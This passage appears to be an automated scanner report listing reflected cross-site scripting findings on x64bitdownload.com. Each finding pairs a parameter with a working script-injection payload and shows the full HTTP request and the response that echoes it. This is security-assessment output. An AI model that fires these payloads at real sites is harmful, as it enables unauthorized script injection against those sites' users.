<input type="hidden" name="retpage" value="/screenshot/e4f2b"><script>alert(1)</script>da38c854bdf" />
...[SNIP]...

1.357. http://www.x64bitdownload.com/software-advanced.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/software-advanced.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1990"><script>alert(1)</script>2069cb8ec45 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /software-advanced.htmlb1990"><script>alert(1)</script>2069cb8ec45 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:26:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/software-advanced.htmlb1990"><script>alert(1)</script>2069cb8ec45" />
...[SNIP]...

1.358. http://www.x64bitdownload.com/software-advanced.html [category_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/software-advanced.html

Issue detail

The value of the category_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9983e"><script>alert(1)</script>7a9a68e5cfe was submitted in the category_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /software-advanced.html?subcategory_id=44&category_id=39983e"><script>alert(1)</script>7a9a68e5cfe&s=d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/software-advanced.html?subcategory_id=44&category_id=39983e"><script>alert(1)</script>7a9a68e5cfe&s=d" />
...[SNIP]...

1.359. http://www.x64bitdownload.com/software-advanced.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/software-advanced.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90432"><script>alert(1)</script>6a90f02313b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /software-advanced.html?90432"><script>alert(1)</script>6a90f02313b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/software-advanced.html?90432"><script>alert(1)</script>6a90f02313b=1" />
...[SNIP]...

1.360. http://www.x64bitdownload.com/software-advanced.html [s parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/software-advanced.html

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c3de"><script>alert(1)</script>2b0419dd3c8 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /software-advanced.html?subcategory_id=44&category_id=3&s=d5c3de"><script>alert(1)</script>2b0419dd3c8 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/software-advanced.html?subcategory_id=44&category_id=3&s=d5c3de"><script>alert(1)</script>2b0419dd3c8" />
...[SNIP]...

1.361. http://www.x64bitdownload.com/software-advanced.html [subcategory_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/software-advanced.html

Issue detail

The value of the subcategory_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f24a6"><script>alert(1)</script>bc5aeab94eb was submitted in the subcategory_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /software-advanced.html?subcategory_id=44f24a6"><script>alert(1)</script>bc5aeab94eb&category_id=3&s=d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/software-advanced.html?subcategory_id=44f24a6"><script>alert(1)</script>bc5aeab94eb&category_id=3&s=d" />
...[SNIP]...

1.362. http://www.x64bitdownload.com/submit-pad-file.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/submit-pad-file.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd8c4"><script>alert(1)</script>c00cfdcf2d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit-pad-file.htmlbd8c4"><script>alert(1)</script>c00cfdcf2d9 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:29:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/submit-pad-file.htmlbd8c4"><script>alert(1)</script>c00cfdcf2d9" />
...[SNIP]...

1.363. http://www.x64bitdownload.com/submit-pad-file.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/submit-pad-file.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1427b"><script>alert(1)</script>c7b5b0e2601 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit-pad-file.html?1427b"><script>alert(1)</script>c7b5b0e2601=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/submit-pad-file.html?1427b"><script>alert(1)</script>c7b5b0e2601=1" />
...[SNIP]...

1.364. http://www.x64bitdownload.com/tellafriend.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/tellafriend.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1567d"><script>alert(1)</script>357966335fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tellafriend.html1567d"><script>alert(1)</script>357966335fd HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:24:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/tellafriend.html1567d"><script>alert(1)</script>357966335fd" />
...[SNIP]...

1.365. http://www.x64bitdownload.com/tellafriend.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/tellafriend.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb5d8"><script>alert(1)</script>439cf2505d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tellafriend.html?bb5d8"><script>alert(1)</script>439cf2505d6=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:11 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/tellafriend.html?bb5d8"><script>alert(1)</script>439cf2505d6=1" />
...[SNIP]...

1.366. http://www.x64bitdownload.com/templates/X64/css/rating.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/templates/X64/css/rating.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be6ec"><script>alert(1)</script>d3d7a4e3e9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templatesbe6ec"><script>alert(1)</script>d3d7a4e3e9d/X64/css/rating.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templatesbe6ec"><script>alert(1)</script>d3d7a4e3e9d/X64/css/rating.css" />
...[SNIP]...

1.367. http://www.x64bitdownload.com/templates/X64/css/rating.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/templates/X64/css/rating.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10a3c"><script>alert(1)</script>8a1532546b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates/X6410a3c"><script>alert(1)</script>8a1532546b6/css/rating.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates/X6410a3c"><script>alert(1)</script>8a1532546b6/css/rating.css" />
...[SNIP]...

1.368. http://www.x64bitdownload.com/templates/X64/css/rating.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/templates/X64/css/rating.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa220"><script>alert(1)</script>18ce10ab220 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates/X64/cssfa220"><script>alert(1)</script>18ce10ab220/rating.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates/X64/cssfa220"><script>alert(1)</script>18ce10ab220/rating.css" />
...[SNIP]...

1.369. http://www.x64bitdownload.com/templates/X64/css/rating.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/templates/X64/css/rating.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acf7e"><script>alert(1)</script>3af3c139581 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates/X64/css/rating.cssacf7e"><script>alert(1)</script>3af3c139581 HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates/X64/css/rating.cssacf7e"><script>alert(1)</script>3af3c139581" />
...[SNIP]...

1.370. http://www.x64bitdownload.com/templates/X64/css/x64_main.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/templates/X64/css/x64_main.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ddb4"><script>alert(1)</script>3c49f3529e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates6ddb4"><script>alert(1)</script>3c49f3529e7/X64/css/x64_main.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates6ddb4"><script>alert(1)</script>3c49f3529e7/X64/css/x64_main.css" />
...[SNIP]...

1.371. http://www.x64bitdownload.com/templates/X64/css/x64_main.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/templates/X64/css/x64_main.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4258f"><script>alert(1)</script>7057cfe06f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates/X644258f"><script>alert(1)</script>7057cfe06f/css/x64_main.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates/X644258f"><script>alert(1)</script>7057cfe06f/css/x64_main.css" />
...[SNIP]...

1.372. http://www.x64bitdownload.com/templates/X64/css/x64_main.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/templates/X64/css/x64_main.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea3de"><script>alert(1)</script>3f9e9d602b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates/X64/cssea3de"><script>alert(1)</script>3f9e9d602b4/x64_main.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates/X64/cssea3de"><script>alert(1)</script>3f9e9d602b4/x64_main.css" />
...[SNIP]...

1.373. http://www.x64bitdownload.com/templates/X64/css/x64_main.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/templates/X64/css/x64_main.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e77f"><script>alert(1)</script>b3861bca820 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates/X64/css/x64_main.css2e77f"><script>alert(1)</script>b3861bca820 HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates/X64/css/x64_main.css2e77f"><script>alert(1)</script>b3861bca820" />
...[SNIP]...

1.374. http://www.x64bitdownload.com/top-software-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/top-software-downloads.html

Issue detail

